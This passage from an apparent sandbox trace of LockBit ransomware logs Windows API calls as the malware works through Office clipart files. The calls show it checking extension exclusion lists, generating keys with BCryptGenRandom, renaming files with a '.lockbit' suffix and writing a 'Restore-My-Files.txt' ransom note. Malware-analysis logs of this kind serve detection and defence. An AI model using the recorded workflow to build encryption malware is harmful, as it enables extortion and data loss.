lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01839_.GIF") returned -1 [0181.070] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.070] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF") returned=".GIF" [0181.070] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.071] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.071] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.072] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.072] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF.lockbit") returned 72 [0181.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01839_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0181.073] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.073] malloc (_Size=0x40068) returned 0x1ff1e60 [0181.073] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1094) returned 1 [0181.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0181.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0181.075] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0181.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.080] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.080] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.082] free (_Block=0x1fa2ed8) [0181.082] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.082] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.082] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.082] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94800, ftCreationTime.dwHighDateTime=0x1bd4e55, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3d94800, ftLastWriteTime.dwHighDateTime=0x1bd4e55, nFileSizeHigh=0x0, nFileSizeLow=0x5fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01840_.GIF", cAlternateFileName="")) returned 1 [0181.082] lstrcmpiW (lpString1=".", lpString2="WB01840_.GIF") returned -1 [0181.082] lstrcmpiW (lpString1="..", lpString2="WB01840_.GIF") returned -1 [0181.082] PathFindExtensionW (pszPath="WB01840_.GIF") returned=".GIF" [0181.082] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.082] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.082] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.082] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.082] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.082] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.082] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.082] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.083] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.083] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.084] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.084] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01840_.GIF") returned -1 [0181.084] lstrcmpiW (lpString1="ntldr", lpString2="WB01840_.GIF") returned -1 [0181.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01840_.GIF") returned -1 [0181.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01840_.GIF") returned -1 [0181.085] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01840_.GIF") returned -1 [0181.085] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01840_.GIF") returned -1 [0181.085] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01840_.GIF") returned -1 [0181.085] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.085] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF") returned=".GIF" [0181.085] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.085] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.085] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.085] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.085] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.086] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.086] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF.lockbit") returned 72 [0181.086] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01840_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0181.088] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.088] malloc (_Size=0x40068) returned 0x3d70450 [0181.088] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1534) returned 1 [0181.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0181.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.089] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0181.089] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0181.096] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.096] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.097] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.098] free (_Block=0x1fa2ed8) [0181.098] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.098] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.098] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983ead00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x983ead00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x76c, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01842_.GIF", cAlternateFileName="")) returned 1 [0181.099] lstrcmpiW (lpString1=".", lpString2="WB01842_.GIF") returned -1 [0181.099] lstrcmpiW (lpString1="..", lpString2="WB01842_.GIF") returned -1 [0181.099] PathFindExtensionW (pszPath="WB01842_.GIF") returned=".GIF" [0181.099] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.099] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.099] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.100] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.100] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.100] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.100] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.100] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.100] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.101] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.101] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="ntldr", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01842_.GIF") returned -1 [0181.101] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01842_.GIF") returned -1 [0181.102] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.102] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF") returned=".GIF" [0181.102] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.102] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.102] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.102] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.102] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.103] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.103] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF.lockbit") returned 72 [0181.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01842_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0181.105] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.105] malloc (_Size=0x40068) returned 0x3ef0008 [0181.105] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1900) returned 1 [0181.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0181.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0181.106] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0181.109] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.109] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.109] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.110] free (_Block=0x1fa2ed8) [0181.110] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.110] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.111] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970d8000, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x970d8000, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01843_.GIF", cAlternateFileName="")) returned 1 [0181.111] 